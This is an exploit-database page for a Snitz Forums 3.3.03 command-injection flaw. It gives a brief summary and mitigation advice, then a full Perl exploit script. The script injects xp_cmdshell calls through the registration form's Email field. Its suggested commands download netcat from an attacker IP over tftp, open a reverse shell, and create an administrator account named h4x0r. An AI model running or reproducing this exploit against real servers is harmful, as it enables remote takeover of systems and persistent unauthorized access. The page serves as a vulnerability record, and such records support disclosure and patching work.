header-logo
Suggest Exploit
vendor:
Snitz Forums
by:
7.5
CVSS
HIGH
Command Injection
77
CWE
Product Name: Snitz Forums
Affected Version From: Snitz Forums 3.3.03
Affected Version To: Potentially other versions
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Remote command execution against Snitz Forums 3.3.03 (and probably others)

This Perl script allows for remote command execution against Snitz Forums 3.3.03 and potentially other versions. The script prompts the user for the web server, port, and path to the 'register.asp' file. It then prompts for a command to execute non-interactively. The script sends a POST request with the command injected into the 'Email' parameter. The vulnerability allows an attacker to execute arbitrary commands on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Snitz Forums or use an alternative forum software. Additionally, input validation and sanitization should be implemented to prevent command injection attacks.
Source

Exploit-DB raw data:

#!/usr/bin/perl

use Socket;

print "\nRemote command execution against Snitz Forums 3.3.03 (and probably others).\n";
print "You accept full responsibility for your actions by using this script.\n";
print "INTERNAL USE ONLY!! DO NOT DISTRIBUTE!!\n";

print "\nWeb server? [www.enterthegame.com]: ";
my $webserver = <STDIN>;
chomp $webserver;
if( $webserver eq "" )
{
$webserver = "www.enterthegame.com";
}

print "\nWeb server port? [80]: ";
my $port = <STDIN>;
chomp $port;
if( $port eq "" )
{
$port = 80;
}

print "\nAbsolute path to \"register.asp\"? [/forum/register.asp]: ";
my $path = <STDIN>;
chomp $path;
if( $path eq "" )
{
$path = "/forum/register.asp";
}

print "\nCommand to execute non-interactively\n";
print " Example commands: tftp -i Your.IP.Here GET nc.exe\n";
print " nc.exe -e cmd.exe Your.IP.Here YourNetcatListeningPortHere\n";
print " or: net user h4x0r /add | net localgroup Administrators h4x0r /add\n";
print "Your command: ";
my $command = <STDIN>;
chomp $command;
$command =~ s/\ /\%20/g;

if( open_TCP( FILEHANDLE, $webserver, 80 ) == undef )
{
print "Error connecting to $webserver\n";
exit( 0 );
}
else
{
my $data1 = $path . "\?mode\=DoIt";
my $data2 = "Email\=\'\%20exec\%20master..xp_cmdshell\%20\'" . $command. "\'\%20--\&Name\=snitz";
my $length = length( $data2 );

print FILEHANDLE "POST $data1 HTTP/1.1\n";
if( $port == 80 )
{
print FILEHANDLE "Host: $webserver\n";
}
else
{
print FILEHANDLE "Host: $webserver:$port\n";
}
print FILEHANDLE "Accept: */*\n";
print FILEHANDLE "User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n";
print FILEHANDLE "Keep-Alive: 300\n";
print FILEHANDLE "Referer: http:\/\/$webserver$path\?mode\=Register\n";
print FILEHANDLE "Content-Type: application/x-www-form-urlencoded\n";
print FILEHANDLE "Content-Length: $length\n\n";
print FILEHANDLE "$data2";

print "\nSQL injection command sent. If you are waiting for a shell on your listening\n";
print "netcat, hit \"enter\" a couple of times to be safe.\n\n";

close( FILEHANDLE );
}

sub open_TCP
{
my( $FS, $dest, $port ) = @_;

my $proto = getprotobyname( 'tcp' );
socket( $FS, PF_INET, SOCK_STREAM, $proto );
my $sin = sockaddr_in( $port, inet_aton( $dest ));
connect( $FS, $sin ) || return undef;

my $old_fh = select( $FS );
$| = 1;
select( $old_fh );
return 1;
}

# milw0rm.com [2003-05-12]

Navigation

Suggest Exploit

Services By CQR